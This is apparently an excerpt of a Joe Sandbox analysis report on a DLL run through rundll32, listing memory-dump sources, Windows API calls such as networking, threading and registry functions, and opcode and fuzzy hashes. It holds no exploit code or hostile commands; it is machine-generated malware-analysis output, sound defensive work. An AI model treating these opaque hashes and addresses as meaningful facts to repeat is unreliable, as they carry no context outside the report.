                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLastsend
                        • String ID:
                        • API String ID: 1802528911-0
                        • Opcode ID: b3dc27c6ceebc67fca712ed52e85c6932b1377e6eab0bc21a5a1361e1e302d5b
                        • Instruction ID: 3204811cc6ad021d6d3f50c93ce4f5bbf8d8741b655ce71ccde1e20f324e0ad7
                        • Opcode Fuzzy Hash: b3dc27c6ceebc67fca712ed52e85c6932b1377e6eab0bc21a5a1361e1e302d5b
                        • Instruction Fuzzy Hash: EE5147716083849FC701CF19C48064EBBE2BF8A325F148A5EE5A88B791D732D94ACB57
                        APIs
                          • Part of subcall function 6CBF0110: RtlAllocateHeap.NTDLL(02840000,00000000,?,?,6CB65AAF,?,00000004,6CB6E4B2,?,6CBE682F,?,?,?,?,6CBE65EB,00000002), ref: 6CBF011F
                        • CreateThread.KERNELBASE(00000000,?,6CBEFBE0,00000000,00010000,00000000), ref: 6CBEFAF8
                        • GetLastError.KERNEL32(?,?,?), ref: 6CBEFB54
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AllocateCreateErrorHeapLastThread
                        • String ID:
                        • API String ID: 3346699961-0
                        • Opcode ID: eefae78c8d3c1d896fc75a5ef12cda67990405c48d72cff466104a94510efa0d
                        • Instruction ID: 7eba713a76ded8b61016851282b6143adbd4375506d5176e4d5435dfc4159079
                        • Opcode Fuzzy Hash: eefae78c8d3c1d896fc75a5ef12cda67990405c48d72cff466104a94510efa0d
                        • Instruction Fuzzy Hash: 9E31B5B0A00289CFDB00DFA9D840BEEBBF5FF48754F148165E518AB780E7759945CBA1
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 6CBEFD60
                        • SetThreadDescription.KERNELBASE(00000000,?), ref: 6CBEFD6E
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: Thread$CurrentDescription
                        • String ID:
                        • API String ID: 654298328-0
                        • Opcode ID: 443826ee12b484754190005f76ec056f8de5f11f56aa064ba863b768f90492bf
                        • Instruction ID: 59d22fc1c07ad92c421e4a0ba7106510128e2c7f6e6a4c125c58a6ae2bf05662
                        • Opcode Fuzzy Hash: 443826ee12b484754190005f76ec056f8de5f11f56aa064ba863b768f90492bf
                        • Instruction Fuzzy Hash: 30218BB1E016998BCB00DF98D844BEEBBB5FF48724F148128E816A7B50D734A905CB91
                        APIs
                        • memset.VCRUNTIME140(?,00000000,00000190), ref: 6CBEF9DA
                        • WSAStartup.WS2_32(00000202,?), ref: 6CBEF9E8
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: Startupmemset
                        • String ID:
                        • API String ID: 1873301828-0
                        • Opcode ID: 27a812de2b38dd303fac7029bd497d28b7c514bbd13cf8d290edb15960377764
                        • Instruction ID: 09e47c74fabbbad0e8bb8d15665ac3c6307b49311926b2fbae40b3a8f57161f8
                        • Opcode Fuzzy Hash: 27a812de2b38dd303fac7029bd497d28b7c514bbd13cf8d290edb15960377764
                        • Instruction Fuzzy Hash: 4411C631A4035C9FDB00DF99E845BDA77B8EF8AB58F004054FD099FB41E771A9488AA1
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000140), ref: 6CB99ECC
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: main
                        • API String ID: 2162964266-3207122276
                        • Opcode ID: 8bc5bb73d930369aa13c760c0e8bd6fca80d70c1e994c66433f1fed5a604cc13
                        • Instruction ID: 6423a8357aa1844e90fcff8ab1a147b1106700e731ee27f7fc063768c7ca6d4b
                        • Opcode Fuzzy Hash: 8bc5bb73d930369aa13c760c0e8bd6fca80d70c1e994c66433f1fed5a604cc13
                        • Instruction Fuzzy Hash: 7B11A231B016409FDB50DF25D490BAEB3A9EF86768F144564D8198BB85DB34F848CBE2
                        APIs
                        • getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 6CB958AE
                        • WSAGetLastError.WS2_32(?,0000FFFF,00001007,?,?,?,6CBD86D3), ref: 6CB958C9
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLastgetsockopt
                        • String ID:
                        • API String ID: 1230475664-0
                        • Opcode ID: f6f4797d4fc768077777ec22a96c5b78a46300d9b4c0517fa4f8bb6d628a65fb
                        • Instruction ID: bc597f8a82724da62c4c1a02adc611a0a132d79f92a33eb7c6ad7495bfe7b3ce
                        • Opcode Fuzzy Hash: f6f4797d4fc768077777ec22a96c5b78a46300d9b4c0517fa4f8bb6d628a65fb
                        • Instruction Fuzzy Hash: ACF08C716557819AE311AB38D8497627AE0AF03716F10CA7CE4EACBA80D274A488C766
                        APIs
                        • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 6CBF84BE
                        • WSAGetLastError.WS2_32(?,00000004,?,?,00000002,6CBA288D,?,?,6CC55F8C,6CC55F64), ref: 6CBF84CB
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLastsetsockopt
                        • String ID:
                        • API String ID: 1729277954-0
                        • Opcode ID: 86d26d2440fd1205c59bf05d2c7d07faf24a101555b9a821f6a5d412e2a99523
                        • Instruction ID: b23b7362c11d63c32314489d24b1ee84e6b0b074a013da6427737f9e6ee648aa
                        • Opcode Fuzzy Hash: 86d26d2440fd1205c59bf05d2c7d07faf24a101555b9a821f6a5d412e2a99523
                        • Instruction Fuzzy Hash: 3AF0A0B1704B805FE7244F28985A7AB7BF59B46324F04896EF6AAD73C1C77298488361
                        APIs
                        • connect.WS2_32(?,6CBD8577,0C7502F8), ref: 6CBE76C6
                        • GetLastError.KERNEL32 ref: 6CBE76D0
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLastconnect
                        • String ID:
                        • API String ID: 374722065-0
                        • Opcode ID: a43453b088e36e2443fca1d73833c9c0991259fd89e5f4435d0c9b04d4d305c0
                        • Instruction ID: 65491f960c3d80c2aeb244e64b07eaeb1aaa35b94d2f1988cf09bba5a19562d1
                        • Opcode Fuzzy Hash: a43453b088e36e2443fca1d73833c9c0991259fd89e5f4435d0c9b04d4d305c0
                        • Instruction Fuzzy Hash: 7FD05E71205281AFEB105F28D444B667BE8EF097A4F29485DE5C0E6602E7B18884DB61
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000110,?,?,6CC55F8C,6CC55F64), ref: 6CBA2202
                        • memmove.VCRUNTIME140(?,?,00000110,?,?,?,?,?,6CC55F8C,6CC55F64), ref: 6CBA222D
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: 8f9a83943ecff3c3d01327289e91639bff6adaa461cee3d96a50dbe9f996bd43
                        • Instruction ID: c91c0fdac4109f8b2f997a633eb05e282bcd25e2ad4b29cfc6383c8ca9b733c1
                        • Opcode Fuzzy Hash: 8f9a83943ecff3c3d01327289e91639bff6adaa461cee3d96a50dbe9f996bd43
                        • Instruction Fuzzy Hash: F3415671909B449BD751CF69C480AA7B7F4FF8A340F048A5EE4DE5B212EB31E482DB42
                        APIs
                        • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,00000000,?,?,6CBB1D27,6CC558B1), ref: 6CBAC99B
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: QueryValue
                        • String ID:
                        • API String ID: 3660427363-0
                        • Opcode ID: b2d7f77419dc6e5d5bb4dbed3a859fb595ac929a729161d0d19e3fd18ce1bddb
                        • Instruction ID: 11b2ff2df30d9af6c6f5d77fd9d7eac1680a850b410f2f3bd3a7628c63128b61
                        • Opcode Fuzzy Hash: b2d7f77419dc6e5d5bb4dbed3a859fb595ac929a729161d0d19e3fd18ce1bddb
                        • Instruction Fuzzy Hash: F12128756083459FD301DF14C490A5BBBE5EF89358F14C92EE8899B740D735EC8ACBA2
                        APIs
                        • SetThreadStackGuarantee.KERNELBASE(?), ref: 6CBEFC1B
                          • Part of subcall function 6CB65AD0: RtlFreeHeap.NTDLL(00000000,?,6CBE7E44), ref: 6CB65AE1
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: FreeGuaranteeHeapStackThread
                        • String ID:
                        • API String ID: 4181682901-0
                        • Opcode ID: 64b1f3d3a31158fc6d6441615e90b3cdcc1c3386aef2dda1c05c1b2444ccb2c2
                        • Instruction ID: fe828c2619df019c9185da282c4c49abaf33686fa1d0f0827955bc28163496ff
                        • Opcode Fuzzy Hash: 64b1f3d3a31158fc6d6441615e90b3cdcc1c3386aef2dda1c05c1b2444ccb2c2
                        • Instruction Fuzzy Hash: 71115BB1D00649CFCB10DF94C845BDEBBB4FB48724F108529E905A7781D379A944CFA4
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f46ce9771bb8d4426f13eab6e4bdfb6ee7ce8766df778026edcd9e3fc4c3fd0
                        • Instruction ID: 238be094a2763d37f84205a5aa6a4cf8c33d396546f436ad8353bd46f7d55005
                        • Opcode Fuzzy Hash: 0f46ce9771bb8d4426f13eab6e4bdfb6ee7ce8766df778026edcd9e3fc4c3fd0
                        • Instruction Fuzzy Hash: 8501DA35605690CBDB24DB64C850ADAB3A2EF5A319B64892CC5DB47B50CB36B80BCB41
                        APIs
                        • DeleteSecurityContext.SECUR32(00000082,?,6CBAFAEC), ref: 6CBBA36C
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ContextDeleteSecurity
                        • String ID:
                        • API String ID: 4039438073-0
                        • Opcode ID: eac5d8fe5c2f17c858a4556f62e6c59d8102c0221c09340e6375aa671f1ef5f2
                        • Instruction ID: 24a7d76f28fba5263fe8f5dd183e0ce29e8915064e2c271363f844afca50da13
                        • Opcode Fuzzy Hash: eac5d8fe5c2f17c858a4556f62e6c59d8102c0221c09340e6375aa671f1ef5f2
                        • Instruction Fuzzy Hash: 7401DA35605690CBD724DB64C490ADEB3A2EF9A318B64892CD5DB47B50CF36BC0ACB40
                        APIs
                        • DeleteSecurityContext.SECUR32(00000082,?,6CBAFAEC), ref: 6CBBA36C
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ContextDeleteSecurity
                        • String ID:
                        • API String ID: 4039438073-0
                        • Opcode ID: 8bc2f6906c0f29b74b4ec750228813afd2611822ff4ab4fa94e34ad48d3b08ba
                        • Instruction ID: 62150e9afe4882e4e5b9fa7fa1770f3e3281f564179c181fd6579baf8241aaa4
                        • Opcode Fuzzy Hash: 8bc2f6906c0f29b74b4ec750228813afd2611822ff4ab4fa94e34ad48d3b08ba
                        • Instruction Fuzzy Hash: 7701BB35605A90CBC724EB64C490ADEB3A6EF5A319B64892CD5DB47B50CF35B90ACB40
                        APIs
                        • DeleteSecurityContext.SECUR32(00000082,?,6CBAFAEC), ref: 6CBBA36C
                          • Part of subcall function 6CBAFFD1: closesocket.WS2_32(?), ref: 6CBB001D
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ContextDeleteSecurityclosesocket
                        • String ID:
                        • API String ID: 1680078162-0
                        • Opcode ID: 9183bda95dc350f32cec4a018b70cc883493cffecfff535ee2b8aa6c4e893ca8
                        • Instruction ID: 03e23088d48879035d5ae35078b069f22975dc5b713ee1069f63af1187caf257
                        • Opcode Fuzzy Hash: 9183bda95dc350f32cec4a018b70cc883493cffecfff535ee2b8aa6c4e893ca8
                        • Instruction Fuzzy Hash: 88F0CD35201A908BC724DB60C490ADEB3A5EF5A218B50892CC5DB43B50CF35B90ACB40
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: closesocket
                        • String ID:
                        • API String ID: 2781271927-0
                        • Opcode ID: ca5c198d7698fb6ec3f3f67b982f363739477708b2823c15f37888cbe515e201
                        • Instruction ID: 886711f29a251fbedd84d51ff5aa896f482f0f94475df506738a6252eefeae9d
                        • Opcode Fuzzy Hash: ca5c198d7698fb6ec3f3f67b982f363739477708b2823c15f37888cbe515e201
                        • Instruction Fuzzy Hash: 17E0D83130088197C609DB19D9549ADB331FFC7218724826DD42557F51CF62EC0AC784
                        APIs
                        • QueryContextAttributesW.SECUR32(?,00000053,?,00000000,?,6CBD6E29), ref: 6CBE72BC
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AttributesContextQuery
                        • String ID:
                        • API String ID: 1320229847-0
                        • Opcode ID: 9c825fc4d548c54623a4f8f53aaa5efde79cc17b748e859b5b5c6e8809207aab
                        • Instruction ID: 9c2f1476955712238aba403dcb83feee0a91c3a681216008d70082051aa4908f
                        • Opcode Fuzzy Hash: 9c825fc4d548c54623a4f8f53aaa5efde79cc17b748e859b5b5c6e8809207aab
                        • Instruction Fuzzy Hash: 9BE0C2F1A01741AFF7204F18DC01B537BE8DB1AB92F15481CF685D7681E7B89840CB61
                        APIs
                        • RtlAllocateHeap.NTDLL(02840000,00000000,?,?,6CB65AAF,?,00000004,6CB6E4B2,?,6CBE682F,?,?,?,?,6CBE65EB,00000002), ref: 6CBF011F
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 704f36bb0c9f305fe0cddee34e75139387331410fb9c239ad650b811444a2f3b
                        • Instruction ID: 22ec17faf96c19b7975e21f1e44dcfe59afd08a230c3f12bbfb2a5fead83ec0d
                        • Opcode Fuzzy Hash: 704f36bb0c9f305fe0cddee34e75139387331410fb9c239ad650b811444a2f3b
                        • Instruction Fuzzy Hash: 7BC08C70340208AF6D001BA6AC0CD3B33BCC6869087004008B44EC2A12EB26E98A84A4
                        APIs
                        • RtlFreeHeap.NTDLL(00000000,?,6CBE7E44), ref: 6CB65AE1
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: b41e54b0bdb2d10422e7a69a29fb5faaca081f65d19b53e146e40962372d0c55
                        • Instruction ID: aa25c5d5c145dce1b1593671f396b3e17bf61d64050c5c0d96298d37a0f34f78
                        • Opcode Fuzzy Hash: b41e54b0bdb2d10422e7a69a29fb5faaca081f65d19b53e146e40962372d0c55
                        • Instruction Fuzzy Hash: C5C092B0351041BBDE059B12CF9DB2CBA37E783304F209248E246598A5D6632996CB09
                        APIs
                        • RegCloseKey.KERNELBASE(?,6CBB1DC5), ref: 6CC009A0
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 838187889195056317e71b2ac1b0ab77bf5a9da4978148ce328c553e22b5c734
                        • Instruction ID: 4d546ddd79ad2b5ba3050e44e67c5e911aae45b7c5809148d2f02caf2910ab37
                        • Opcode Fuzzy Hash: 838187889195056317e71b2ac1b0ab77bf5a9da4978148ce328c553e22b5c734
                        • Instruction Fuzzy Hash: 3FA002F4F539425AFE2C6F22C619A2B2DB45A4628A306055D6E46D0404D727C0828659
                        APIs
                        • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6CBEC9F0
                        • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6CBECA04
                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6CBECA36
                        • GetProcAddress.KERNEL32(SymSetOptions), ref: 6CBECA64
                        • GetProcAddress.KERNEL32(SymInitializeW), ref: 6CBECA93
                        • GetCurrentProcess.KERNEL32 ref: 6CBECAB1
                        • memset.VCRUNTIME140(00000000,00000000,000007FE), ref: 6CBECB04
                        • GetProcAddress.KERNEL32(SymGetSearchPathW), ref: 6CBECB34
                        • GetCurrentProcess.KERNEL32 ref: 6CBECB48
                        • lstrlenW.KERNEL32(00000002), ref: 6CBECB5C
                        • memmove.VCRUNTIME140(?,Local\RustBacktraceMutex00000000,00000021), ref: 6CBECB82
                        • GetCurrentProcessId.KERNEL32 ref: 6CBECB8A
                        • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6CBECC0C
                        • CloseHandle.KERNEL32(00000000), ref: 6CBECC2B
                        • ReleaseMutex.KERNEL32(00000000), ref: 6CBECC39
                        • GetProcAddress.KERNEL32(EnumerateLoadedModulesW64), ref: 6CBECCBC
                        • GetCurrentProcess.KERNEL32 ref: 6CBECCD0
                        • GetProcAddress.KERNEL32(SymSetSearchPathW), ref: 6CBECD2E
                        • GetCurrentProcess.KERNEL32 ref: 6CBECD3E
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
